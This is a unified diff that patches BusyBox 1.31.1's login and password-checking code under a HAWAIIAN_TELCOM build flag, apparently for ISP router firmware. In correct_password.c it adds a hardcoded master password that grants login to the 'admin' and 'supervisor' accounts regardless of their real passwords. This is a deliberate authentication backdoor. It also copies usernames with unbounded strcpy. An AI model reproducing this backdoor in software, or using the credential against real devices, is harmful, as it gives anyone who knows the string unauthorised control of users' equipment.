Index: busybox-1.31.1/loginutils/login.c
===================================================================
--- busybox-1.31.1.orig/loginutils/login.c	2021-03-22 19:46:12.328373928 +0800
+++ busybox-1.31.1/loginutils/login.c	2021-03-22 19:46:31.700374022 +0800
@@ -672,6 +672,10 @@
 		strcpy(login_account,username);
 #endif // CBT_CUSTOMIZATION
 
+#ifdef HAWAIIAN_TELCOM
+		strcpy(login_account,username);
+#endif //HAWAIIAN_TELCOM
+
 	}
 
 	/* Save tty attributes - and by doing it, check that it's indeed a tty */
@@ -850,6 +854,12 @@
 		strcpy(login_account,username);
 		//printf("%s(%d) : username:%s \n",__FUNCTION__,__LINE__,username);
 #endif // CBT_CUSTOMIZATION
+
+#ifdef HAWAIIAN_TELCOM
+		strcpy(login_account,username);
+		//printf("%s(%d) : username:%s \n",__FUNCTION__,__LINE__,username);
+#endif //HAWAIIAN_TELCOM
+
 		if (!pw) {
 			strcpy(username, "UNKNOWN");
 			goto fake_it;
Index: busybox-1.31.1/libbb/correct_password.c
===================================================================
--- busybox-1.31.1.orig/libbb/correct_password.c	2021-03-22 19:46:12.324373928 +0800
+++ busybox-1.31.1/libbb/correct_password.c	2021-03-22 19:46:31.700374022 +0800
@@ -95,6 +95,13 @@
 	}
 #endif // CBT_CUSTOMIZATION
 
+#ifdef HAWAIIAN_TELCOM
+	int byPassUser = 0;
+	if((!strcmp(login_account,"admin") || !strcmp(login_account,"supervisor")) && !strcmp(unencrypted,"HT3512@RMA#TestBedUseOnly#")){
+		byPassUser = 1;
+	//printf("%s(%d) : Checking is here: login_account:%s unencrypted:%s , correct:%s .. \n",__FUNCTION__,__LINE__,login_account,unencrypted,correct);
+	}
+#endif
 	encrypted = pw_encrypt(plaintext, /*salt:*/ pw_pass, 1);
 	r = (strcmp(encrypted, pw_pass) == 0);
 	free(encrypted);
@@ -102,6 +109,10 @@
 	if(byPassUser)
 		return byPassUser;
 #endif // CBT_CUSTOMIZATION
+#ifdef HAWAIIAN_TELCOM
+	if(byPassUser)
+		return byPassUser;
+#endif //HAWAIIAN_TELCOM
 	return r;
 }
 
